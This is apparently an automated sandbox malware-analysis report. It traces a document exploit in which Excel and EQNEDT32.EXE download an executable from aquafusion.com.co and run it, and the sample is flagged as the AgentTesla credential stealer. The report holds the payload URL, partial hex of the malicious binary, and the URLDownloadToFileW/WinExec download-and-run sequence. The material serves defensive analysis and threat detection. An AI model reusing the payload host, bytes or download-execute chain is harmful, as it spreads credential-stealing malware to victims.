                          Dec 10, 2024 14:20:54.955718040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.955802917 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.955857038 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.955883980 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956078053 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956131935 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956132889 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956146002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956192970 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956192970 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956661940 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956731081 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.956731081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.956773043 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.957412004 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.957488060 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.104825020 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.104934931 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.104943991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105304956 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.105345011 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105345011 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105514050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.105551958 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.105943918 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.106029987 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.106066942 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.106141090 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.106769085 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.106851101 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.107069969 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.107178926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.107433081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.107476950 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.107724905 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.107765913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.108215094 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.108267069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.108268023 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.108930111 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.108975887 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.108975887 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.109165907 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.109267950 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.109786034 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.109831095 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.109860897 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.109942913 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.110465050 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.110594034 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.110630035 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.110630035 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.111491919 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.111505032 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.111793041 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112025976 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.112066984 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112138987 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.112215996 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112807035 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.112848997 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.112925053 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.113008022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.113523960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.113567114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.113631010 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.113692999 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.114326000 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.114403963 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.114463091 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.114533901 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115219116 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.115333080 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115345001 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.115403891 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115884066 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.115956068 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.115997076 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.116066933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.116657972 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.116708994 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.116729975 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.116884947 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.117453098 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.117500067 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.117744923 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.117793083 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.118175030 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.118218899 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.118552923 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.118633032 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119045973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119107962 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119236946 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119296074 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119851112 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119863987 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.119899988 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.119925976 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.120572090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.120634079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.120671988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.120721102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.121325970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.121337891 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.121371984 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.121395111 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122167110 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122179985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122232914 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122232914 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122855902 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122900963 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.122940063 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.122940063 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.123768091 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.123780966 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.123842955 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.124444008 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.124495983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.124806881 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.124917030 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.125560045 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.125572920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.125612974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.125612974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.126137972 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126148939 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126276016 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.126909971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126921892 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.126965046 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.127610922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.127623081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.127686977 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.128552914 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.128566027 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.128604889 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.129317045 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.129332066 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.129369974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.129369974 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.129936934 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.129950047 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.130038977 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.130776882 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.130789995 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.130893946 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.131571054 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.131583929 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.131622076 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.132369995 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.132380962 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.132427931 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.133183002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.133197069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:55.133244991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:55.133244991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:57.483443975 CET4916580192.168.2.22190.90.160.170
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 10, 2024 14:20:51.070528984 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Dec 10, 2024 14:20:51.811662912 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 14:20:51.070528984 CET | 192.168.2.22 | 8.8.8.8 | 0x5b3e | Standard query (0) | aquafusion.com.co | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 14:20:51.811662912 CET | 8.8.8.8 | 192.168.2.22 | 0x5b3e | No error (0) | aquafusion.com.co | (none) | 190.90.160.170 | A (IP address) | IN (0x0001) | false
                          • aquafusion.com.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 190.90.160.170 | 80 | 3608 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 14:20:51.945811987 CET | 318 | OUT | GET /ngbx/ngown.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: aquafusion.com.co
Connection: Keep-Alive
Dec 10, 2024 14:20:53.183305979 CET | 1236 | IN | HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
content-type: application/x-msdownload
last-modified: Tue, 10 Dec 2024 07:12:19 GMT
accept-ranges: bytes
content-length: 1051136
date: Tue, 10 Dec 2024 13:20:52 GMT
server: LiteSpeed
                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 1c ad cf 72 7d c3 9c 72 7d c3 9c 72 7d c3 9c 34 2c 22 9c 70 7d c3 9c ec dd 04 9c 73 7d c3 9c 7f 2f 1c 9c 41 7d c3 9c 7f 2f 23 9c c3 7d c3 9c 7f 2f 22 9c 47 7d c3 9c 7b 05 40 9c 7b 7d c3 9c 7b 05 50 9c 57 7d c3 9c 72 7d c2 9c 52 7f c3 9c 0f 04 29 9c 22 7d c3 9c 0f 04 1c 9c 73 7d c3 9c 7f 2f 18 9c 73 7d c3 9c 72 7d 54 9c 73 7d c3 9c 0f 04 1d 9c 73 7d c3 9c 52 69 63 68 72 7d c3 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bd 94 57 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 de 08 00 00 28 07 00 00 00 00 00 cd 7d 02 00 00 10 00 00 00 f0 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$6r}r}r}4,"p}s}/A}/#}/"G}{@{}{PW}r}R)"}s}/s}r}Ts}s}Richr}PELWg"(}@@@@L|pq+pH@.text `.rdata@@.datatR@.rsrcp@@.relocqr@B
Dec 10, 2024 14:20:53.183404922 CET | 488 | IN | Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 41 4c 00 e8 b7 a2 03 00 68 59 b5 43 00 e8 2c 1d 02 00 59 c3 e8 59 39 00 00 68 63 b5
                          Data Ascii: DALhYC,YY9hcCY8hiCYhnCYM,hsCYhxCYQh}CYSLQ@SLP_hCY1hCYshCYgL
Dec 10, 2024 14:20:53.183410883 CET | 1236 | IN | Data Raw: 10 4b 79 f3 83 8e 8c 01 00 00 ff 33 c0 83 8e 90 01 00 00 ff 83 8e bc 01 00 00 ff 83 8e c0 01 00 00 ff 89 86 6c 01 00 00 89 86 70 01 00 00 89 86 74 01 00 00 89 86 78 01 00 00 89 86 7c 01 00 00 89 86 80 01 00 00 88 86 84 01 00 00 89 86 88 01 00 00
                          Data Ascii: Ky3lptx|f_^[V4HWLPtXLj0^U]dUWLVuWVl
Dec 10, 2024 14:20:53.183517933 CET | 1236 | IN | Data Raw: e8 85 0f 00 00 8b 0d 10 58 4c 00 8b 0c 81 8b 09 ff 71 1c 50 e8 86 0c 00 00 6a 00 ff 75 0c 6a 07 ff 75 08 ff 15 84 f5 48 00 5d c2 08 00 55 8b ec ff 75 08 b9 b0 57 4c 00 e8 4d 0f 00 00 50 e8 50 09 00 00 6a 00 6a 00 6a 02 ff 75 08 ff 15 84 f5 48 00
                          Data Ascii: XLqPjujuH]UuWLMPPjjjuH]UQSVuWL!uWLVEMIIut-$XLtSuu\^[]xHuVuh8U\SVWuWL
Dec 10, 2024 14:20:53.183523893 CET | 1236 | IN | Data Raw: 85 c0 74 08 3b b0 80 00 00 00 75 3e 8b 5e 04 85 db 0f 85 1e 9f 03 00 8b 87 c8 01 00 00 3b f0 75 3e 8b 06 89 87 c8 01 00 00 56 e8 a1 f2 01 00 8b 45 0c 59 85 c0 74 13 5b 6a 01 6a 00 ff 37 ff 15 58 f6 48 00 5f 5e 5d c2 08 00 85 c0 75 1b 8b b7 c8 01
                          Data Ascii: t;u>^;u>VEYt[jj7XH_^]uMt9t6UM$uE(@S]#E(VW} jQuWSuuQhHhHPuuENLfEhf
Dec 10, 2024 14:20:53.183547020 CET | 1236 | IN | Data Raw: 57 e8 0b fb ff ff 83 7f 18 00 0f 85 63 9c 03 00 8b 0d 34 58 4c 00 6a 03 5a 89 55 fc 3b ca 0f 8c ad 00 00 00 a1 24 58 4c 00 8b 04 90 8b 30 85 f6 0f 84 8c 00 00 00 8b 46 04 3b 47 04 0f 85 80 00 00 00 0f b6 86 90 00 00 00 83 e8 0a 0f 84 7b 9c 03 00
                          Data Ascii: Wc4XLjZU;$XL0F;G{r:VW~dk~hs~D{~P>t6<H&uWL4XLUBU;Vu V$ZXLt
Dec 10, 2024 14:20:53.183556080 CET | 1236 | IN | Data Raw: 04 00 83 8e 98 00 00 00 ff 83 8e 94 00 00 00 ff e9 6a ff ff ff 55 8b ec 51 8b 0d 28 58 4c 00 56 57 39 0d 30 58 4c 00 75 6e 81 3d 34 58 4c 00 ff ff 00 00 0f 84 8e 00 00 00 68 a0 00 00 00 e8 6f e8 01 00 59 85 c0 0f 84 80 00 00 00 8b c8 e8 22 0e 00
                          Data Ascii: jUQ(XLVW90XLun=4XLhoY"E}P XL54XLF54XL$XL0XL9MIO_^]j^3;~$XL98u#hYt3F;|UVuWt$jV\H;Gxs
Dec 10, 2024 14:20:53.183764935 CET | 1236 | IN | Data Raw: f6 48 00 6a ff 57 b9 b0 57 4c 00 e8 5c f9 ff ff 83 3d d4 57 4c 00 00 75 16 68 56 12 40 00 6a 28 6a 00 6a 00 ff 15 18 f7 48 00 a3 d4 57 4c 00 ff 05 d0 57 4c 00 b9 b0 57 4c 00 6a 00 89 35 1c 58 4c 00 e8 47 05 00 00 f7 c3 00 00 00 10 0f 85 7f 97 03
                          Data Ascii: HjWWL\=WLuhV@j(jjHWLWLWLj5XLG_^[] 3"'MPMRU}WWL^XLt{XL3V0M8V:tV:9D}zttdttQtC~)1~8
Dec 10, 2024 14:20:53.183770895 CET | 1236 | IN | Data Raw: ff 36 ff 15 10 f5 48 00 8d 4d 2c e8 04 6a 00 00 8b c7 5f 5e 5b 8b e5 5d c2 34 00 8a 45 f4 e9 74 ff ff ff ff 73 50 57 e8 79 59 08 00 eb c4 ff 73 54 57 e8 62 57 08 00 eb bf 83 65 f4 00 e9 4c 9f 03 00 aa c9 43 00 c8 c9 43 00 e6 c9 43 00 04 ca 43 00
                          Data Ascii: 6HM,j_^[]4EtsPWyYsTWbWeLCCCC"C@C|CCCCBC^CC+CnCCCCCTCrC.@/CCCC6C&.@^CCU}VuNlF`^f@h]uFlUQQE
Dec 10, 2024 14:20:53.183790922 CET | 1236 | IN | Data Raw: 83 cf ff 8d 4e 14 89 1e 89 7e 04 89 5e 08 89 5e 0c 89 5e 10 e8 ce 42 00 00 8d 4e 24 e8 c6 42 00 00 8d 4e 54 89 5e 34 89 5e 38 89 5e 3c 89 5e 40 89 5e 44 89 7e 48 89 7e 4c 89 5e 50 e8 a6 42 00 00 89 5e 64 8b c6 89 5e 68 89 5e 70 89 5e 78 c7 46 7c
                          Data Ascii: N~^^^BN$BNT^4^8^<^@^D~H~L^PB^d^h^p^xF|fffff_^[USVj[F9Ft&SYtOMNFF^[]jX;s(3FWQI~
Dec 10, 2024 14:20:53.302963972 CET | 1236 | IN | Data Raw: 08 e8 aa 20 00 00 8d 4d f0 e8 5e 60 00 00 8b 75 bc 8d 4d f0 e8 fa 3d 00 00 8d 45 f0 50 8d 4d a0 e8 57 06 00 00 8b 7d f0 57 68 44 fa 48 00 e8 76 f6 01 00 59 59 85 c0 0f 84 1e 99 03 00 57 68 1c fa 48 00 e8 61 f6 01 00 59 59 85 c0 0f 84 25 99 03 00
                          Data Ascii: M^`uM=EPMW}WhDHvYYWhHaYY%WhHLYY,WhH7YYu;aRLEPMERLPOGEPM=RL-MYNQjSWe3u@EjPE


                          Target ID: 0
                          Start time: 08:20:00
                          Start date: 10/12/2024
                          Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit): false
                          Commandline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                          Imagebase: 0x13fee0000
                          File size: 28'253'536 bytes
                          MD5 hash: D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: false

                          Target ID: 2
                          Start time: 08:20:48
                          Start date: 10/12/2024
                          Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit): true
                          Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase: 0x400000
                          File size: 543'304 bytes
                          MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 5
                          Start time: 08:20:54
                          Start date: 10/12/2024
                          Path: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          Wow64 process (32bit): true
                          Commandline: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          Imagebase: 0xd40000
                          File size: 1'051'136 bytes
                          MD5 hash: EF05B0557B2C8F0C951A1B21B812E75F
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000005.00000002.486416545.0000000000D00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          Reputation: low
                          Has exited: true

                          Target ID: 6
                          Start time: 08:20:55
                          Start date: 10/12/2024
                          Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit): true
                          Commandline: C:\Users\user\AppData\Local\Temp\ghxtg8op.exe
                          Imagebase: 0x11a0000
                          File size: 45'248 bytes
                          MD5 hash: 19855C0DC5BEC9FDF925307C57F9F5FC
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.635366248.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.635675466.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation: moderate
                          Has exited: false


                            Execution Graph

                            Execution Coverage:16.9%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:67.3%
                            Total number of Nodes:107
                            Total number of Limit Nodes:3


                            Control-flow Graph

                            APIs
                            • LoadLibraryW.KERNEL32(0356046C), ref: 0356047A
                              • Part of subcall function 03560494: URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFileLibraryLoad
                            • String ID:
                            • API String ID: 2776762486-0
                            • Opcode ID: 22eebc276f5b49a441160e739c2ab75f2086f15045b57c62eeaf238410b76855
                            • Instruction ID: 27cb517ab8996e8f5de363ae60fc193250408ff02c67f8f0c073a0f2bf8afe60
                            • Opcode Fuzzy Hash: 22eebc276f5b49a441160e739c2ab75f2086f15045b57c62eeaf238410b76855
                            • Instruction Fuzzy Hash: B321C4A144C7C22FC722D670AD7AB65BF247BA3610F1CC6CE95D50F1E3A35492059752

                            Control-flow Graph

                            APIs
                            • WinExec.KERNEL32(?,00000001), ref: 0356054D
                              • Part of subcall function 03560560: ExitProcess.KERNELBASE(00000000), ref: 03560565
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: ExecExitProcess
                            • String ID:
                            • API String ID: 4112423671-0
                            • Opcode ID: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction ID: 31d79f1c1dd14c0a3c547983067fb985165132ad556052ee14b35d3e46f68851
                            • Opcode Fuzzy Hash: 7b4514c50c6803db6e1acb15a029f5a29cf7c6a0b93d7e4af60678115a653edc
                            • Instruction Fuzzy Hash: A6F0D1D990E34221DA30F628E8757A6AF51BB71320FCC884BA882070F5E56891C38619

                            Control-flow Graph

                            APIs
                            • URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.486831561.0000000003560000.00000004.00000020.00020000.00000000.sdmp, Offset: 03560000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_3560000_EQNEDT32.jbxd
                            Similarity
                            • API ID: DownloadFile
                            • String ID:
                            • API String ID: 1407266417-0
                            • Opcode ID: 349008c7f50ef8f21d6367dce86b465c53a3ccc32d360f951f42ba3ef2c074d6
                            • Instruction ID: a9874500c8d652537cd5917fc767dc634c899d52b04dc0a0579cdb1309653207
                            • Opcode Fuzzy Hash: 349008c7f50ef8f21d6367dce86b465c53a3ccc32d360f951f42ba3ef2c074d6
                            • Instruction Fuzzy Hash: D441BBA144D3C62FC722D770AD6A666BF247A93111F0CCACFD5D50B1F3E3A4A6069352

                            Control-flow Graph

                            APIs
                            • URLDownloadToFileW.URLMON(00000000,035604A5,?,00000000,00000000), ref: 035604F7
                            Memory Dump Source
